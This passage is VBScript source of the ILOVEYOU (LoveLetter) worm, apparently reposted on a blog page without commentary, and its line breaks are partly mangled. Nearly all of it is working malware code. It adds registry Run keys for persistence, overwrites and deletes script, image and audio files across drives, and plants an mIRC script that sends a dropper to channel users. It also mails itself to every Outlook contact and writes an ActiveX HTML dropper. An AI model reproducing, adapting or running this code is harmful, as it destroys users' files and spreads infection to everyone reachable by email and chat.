 GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe"
 end if
 end if
 if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe"
 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet
 Explorer\Main\Start Page","about:blank"
 end if
 end sub
 sub listadriv
 On Error Resume Next
 Dim d,dc,s
 Set dc = fso.Drives
 For Each d in dc
 If d.DriveType = 2 or d.DriveType=3 Then
 folderlist(d.path&"\")
 end if
 Next
 listadriv = s
 end sub
 sub infectfiles(folderspec)
 On Error Resume Next
 dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
 set f = fso.GetFolder(folderspec)
 set fc = f.Files
 for each f1 in fc
 ext=fso.GetExtensionName(f1.path)
 ext=lcase(ext)
 s=lcase(f1.name)
 if (ext="vbs") or (ext="vbe") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 bname=fso.GetBaseName(f1.path)
 set cop=fso.GetFile(f1.path)
 cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path)
 elseif(ext="jpg") or (ext="jpeg") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 set cop=fso.GetFile(f1.path)
 cop.copy(f1.path&".vbs")
 fso.DeleteFile(f1.path)
 elseif(ext="mp3") or (ext="mp2") then
 set mp3=fso.CreateTextFile(f1.path&".vbs")
 mp3.write vbscopy
 mp3.close
 set att=fso.GetFile(f1.path)
 att.attributes=att.attributes+2
 end if
 if (eq<>folderspec) then
 if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
 set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]"
 scriptini.WriteLine ";mIRC Script"
 scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"
 scriptini.WriteLine "    corrupt... WINDOWS will affect and will not run correctly. thanks"
 scriptini.WriteLine ";"
 scriptini.WriteLine ";Khaled Mardam-Bey"
 scriptini.WriteLine ";http://www.mirc.com"
 scriptini.WriteLine ";"
 scriptini.WriteLine "n0=on 1:JOIN:#:{"
 scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2=  /.dcc send $nick
 "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
 scriptini.WriteLine "n3=}"
 scriptini.close
 eq=folderspec
 end if
 end if
 next
 end sub
 sub folderlist(folderspec)
 On Error Resume Next
 dim f,f1,sf
 set f = fso.GetFolder(folderspec)
 set sf = f.SubFolders
 for each f1 in sf
 infectfiles(f1.path)
 folderlist(f1.path)
 next
 end sub
 sub regcreate(regkey,regvalue)
 Set regedit = CreateObject("WScript.Shell")
 regedit.RegWrite regkey,regvalue
 end sub
 function regget(value)
 Set regedit = CreateObject("WScript.Shell")
 regget=regedit.RegRead(value)
 end function
 function fileexist(filespec)
 On Error Resume Next
 dim msg
 if (fso.FileExists(filespec)) Then
 msg = 0
 else
 msg = 1
 end if
 fileexist = msg
 end function
 function folderexist(folderspec)
 On Error Resume Next
 dim msg
 if (fso.GetFolderExists(folderspec)) then
 msg = 0
 else
 msg = 1
 end if
 fileexist = msg
 end function
 sub spreadtoemail()
 On Error Resume Next
 dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
 set regedit=CreateObject("WScript.Shell")
 set out=WScript.CreateObject("Outlook.Application")
 set mapi=out.GetNameSpace("MAPI")
 for ctrlists=1 to mapi.AddressLists.Count
 set a=mapi.AddressLists(ctrlists)
 x=1
 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then
 regv=1
 end if
 if (int(a.AddressEntries.Count)>int(regv)) then
 for ctrentries=1 to a.AddressEntries.Count
 malead=a.AddressEntries(x)
 regad=""
 regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead )
 if (regad="") then
 set male=out.CreateItem(0)
 male.Recipients.Add(malead)
 male.Subject = "ILOVEYOU"
 male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
 male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if
 x=x+1
 next
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if
 next
 Set out=Nothing
 Set mapi=Nothing
 end sub
 sub html
 On Error Resume Next
 dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -
 LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
 @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@
 CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
 "<?-?HEAD><BODY
 ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
 HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
 "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@
 BGPROPERTIES=@-@fixed@-@
 BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
 "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to
 Enable ActiveX<?-?p>"&vbcrlf& _
 "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
 BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _
 "<?-?BODY><?-?HTML>"&vbcrlf& _
 "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _
 "if (window.screen){var wi=screen.availWidth;var
 hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrl f& _
 "?-??-?-->"&vbcrlf& _
 "<?-?SCRIPT>"&vbcrlf& _
 "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _
 "on error resume next"&vbcrlf& _
 "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _
 "code="
 dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
 "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
 "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set
 wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
 "wri.write code4"&vbcrlf& _
 "wri.close"&vbcrlf& _
 "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _
 "aw=0"&vbcrlf& _
 "end if"&vbcrlf& _
 "if (aw=1) then"&vbcrlf& _
 "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _
 "end if"&vbcrlf& _
 "end if"&vbcrlf& _
 "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
 "regedit.RegWrite
 @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^
 -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _
 "<?-?SCRIPT>"
 dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
 dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
 dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
 dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
 dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
 dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
 set fso=CreateObject("Scripting.FileSystemObject")
 set c=fso.OpenTextFile(WScript.ScriptFullName,1)
 lines=Split(c.ReadAll,vbcrlf)
 l1=ubound(lines)
 for n=0 to ubound(lines)
 lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
 lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then
 lines(n)=chr(34)+lines(n)+chr(34)
 else
 lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if
 next
 set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close
 set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5
 d.write join(lines,vbcrlf)
 d.write vbcrlf
 d.write dt6
 d.close
 end sub
Read »

Ads

Copyright © 2015 IT Vui Vẻ

Designed by Templatezy & Copy Blogger Themes